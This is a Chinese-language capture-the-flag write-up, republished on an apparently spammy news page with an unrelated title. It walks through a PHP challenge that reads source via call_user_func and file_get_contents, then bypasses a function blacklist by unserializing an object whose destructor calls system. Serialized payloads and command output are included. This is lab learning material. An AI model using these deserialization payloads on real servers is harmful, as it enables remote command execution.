当前位置：首页 > news >正文

评价一个网站的优缺点建设部网站1667号下载

news 2025/9/15 6:43:56

评价一个网站的优缺点,建设部网站1667号下载,wordpress页面伪静态,广州娱乐场所最新通知时间一跳一跳的抓个包很奇怪结合上面的 date() 认为第一个是函数我们随便输一个看看发现过滤了随便输一个 linux指令发现报错了 call_user_func() 看看是啥很容易理解第一个参数是函数名后面是参数那么这里就是 func 函数 p 数值所以我们看看有什么办法可以… 时间一跳一跳的抓个包很奇怪结合上面的 date() 认为第一个是函数我们随便输一个看看发现过滤了随便输一个 linux指令发现报错了 call_user_func() 看看是啥很容易理解第一个参数是函数名后面是参数那么这里就是 func 函数 p 数值所以我们看看有什么办法可以我们尝试读取源代码看看吧最简单的伪协议函数 funcfile_get_contentspindex.php 成功读取了 ?php$disable_fun array(exec,shell_exec,system,passthru,proc_open,show_source,phpinfo,popen,dl,eval,proc_terminate,touch,escapeshellcmd,escapeshellarg,assert,substr_replace,call_user_func_array,call_user_func,array_filter, array_walk, array_map,registregister_shutdown_function,register_tick_function,filter_var, filter_var_array, uasort, uksort, array_reduce,array_walk, array_walk_recursive,pcntl_exec,fopen,fwrite,file_put_contents);function gettime($func, $p) {$result call_user_func($func, $p);$a gettype($result);if ($a string) {return $result;} else {return ;}}class Test {var $p Y-m-d h:i:s a;var $func date;function __destruct() {if ($this-func ! ) {echo gettime($this-func, $this-p);}}}$func $_REQUEST[func];$p $_REQUEST[p];if ($func ! null) {$func strtolower($func);if (!in_array($func,$disable_fun)) {echo gettime($func, $p);}else {die(Hacker...);}}? 过滤了许多函数 system在里面这里我们发现了 __destruct() class Test {var $p Y-m-d h:i:s a;var $func date;function __destruct() {if ($this-func ! ) {echo gettime($this-func, $this-p);}}} 这里很显然魔术方法就是让我们反序列了既然 $p为参数 $func为函数名我们直接构造序列化就可以了 ?phpclass Test {var $p ls;var $func system;function __destruct() {if ($this-func ! ) {echo gettime($this-func, $this-p);}}} $anew Test(); echo urlencode(serialize($a)); O:4:Test:2:{s:1:p;s:17:find /-name flag*;s:4:func;s:6:system;} 查找flag文件 /script p/proc/sys/kernel/sched_domain/cpu0/domain0/flags /proc/sys/kernel/sched_domain/cpu1/domain0/flags /proc/sys/kernel/sched_domain/cpu10/domain0/flags /proc/sys/kernel/sched_domain/cpu11/domain0/flags /proc/sys/kernel/sched_domain/cpu12/domain0/flags /proc/sys/kernel/sched_domain/cpu13/domain0/flags /proc/sys/kernel/sched_domain/cpu14/domain0/flags /proc/sys/kernel/sched_domain/cpu15/domain0/flags /proc/sys/kernel/sched_domain/cpu16/domain0/flags /proc/sys/kernel/sched_domain/cpu17/domain0/flags /proc/sys/kernel/sched_domain/cpu18/domain0/flags /proc/sys/kernel/sched_domain/cpu19/domain0/flags /proc/sys/kernel/sched_domain/cpu2/domain0/flags /proc/sys/kernel/sched_domain/cpu20/domain0/flags /proc/sys/kernel/sched_domain/cpu21/domain0/flags /proc/sys/kernel/sched_domain/cpu22/domain0/flags /proc/sys/kernel/sched_domain/cpu23/domain0/flags /proc/sys/kernel/sched_domain/cpu24/domain0/flags /proc/sys/kernel/sched_domain/cpu25/domain0/flags /proc/sys/kernel/sched_domain/cpu26/domain0/flags /proc/sys/kernel/sched_domain/cpu27/domain0/flags /proc/sys/kernel/sched_domain/cpu28/domain0/flags /proc/sys/kernel/sched_domain/cpu29/domain0/flags /proc/sys/kernel/sched_domain/cpu3/domain0/flags /proc/sys/kernel/sched_domain/cpu30/domain0/flags /proc/sys/kernel/sched_domain/cpu31/domain0/flags /proc/sys/kernel/sched_domain/cpu4/domain0/flags /proc/sys/kernel/sched_domain/cpu5/domain0/flags /proc/sys/kernel/sched_domain/cpu6/domain0/flags /proc/sys/kernel/sched_domain/cpu7/domain0/flags /proc/sys/kernel/sched_domain/cpu8/domain0/flags /proc/sys/kernel/sched_domain/cpu9/domain0/flags /sys/devices/pnp0/00:00/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS15/flags /sys/devices/platform/serial8250/tty/ttyS6/flags /sys/devices/platform/serial8250/tty/ttyS23/flags /sys/devices/platform/serial8250/tty/ttyS13/flags /sys/devices/platform/serial8250/tty/ttyS31/flags /sys/devices/platform/serial8250/tty/ttyS4/flags /sys/devices/platform/serial8250/tty/ttyS21/flags /sys/devices/platform/serial8250/tty/ttyS11/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS28/flags /sys/devices/platform/serial8250/tty/ttyS18/flags /sys/devices/platform/serial8250/tty/ttyS9/flags /sys/devices/platform/serial8250/tty/ttyS26/flags /sys/devices/platform/serial8250/tty/ttyS16/flags /sys/devices/platform/serial8250/tty/ttyS7/flags /sys/devices/platform/serial8250/tty/ttyS24/flags /sys/devices/platform/serial8250/tty/ttyS14/flags /sys/devices/platform/serial8250/tty/ttyS5/flags /sys/devices/platform/serial8250/tty/ttyS22/flags /sys/devices/platform/serial8250/tty/ttyS12/flags /sys/devices/platform/serial8250/tty/ttyS30/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /sys/devices/platform/serial8250/tty/ttyS20/flags /sys/devices/platform/serial8250/tty/ttyS10/flags /sys/devices/platform/serial8250/tty/ttyS29/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/platform/serial8250/tty/ttyS19/flags /sys/devices/platform/serial8250/tty/ttyS27/flags /sys/devices/platform/serial8250/tty/ttyS17/flags /sys/devices/platform/serial8250/tty/ttyS8/flags /sys/devices/platform/serial8250/tty/ttyS25/flags /sys/devices/virtual/net/lo/flags /sys/devices/virtual/net/eth0/flags /sys/devices/virtual/net/tunl0/flags /tmp/flagoefiu4r93 /tmp/flagoefiu4r93/p 很显然最后两个很奇怪我们直接读取 funcunserializepO:4:Test:2:{s:1:p;s:22:cat /tmp/flagoefiu4r93;s:4:func;s:6:system;} 得到了 flag 这里主要考点是 call_user_func() 然后通过反序列化传递参数很简单的一道题了水一下吧^^

查看全文

http://www.tj-hxxt.cn/news/134401.html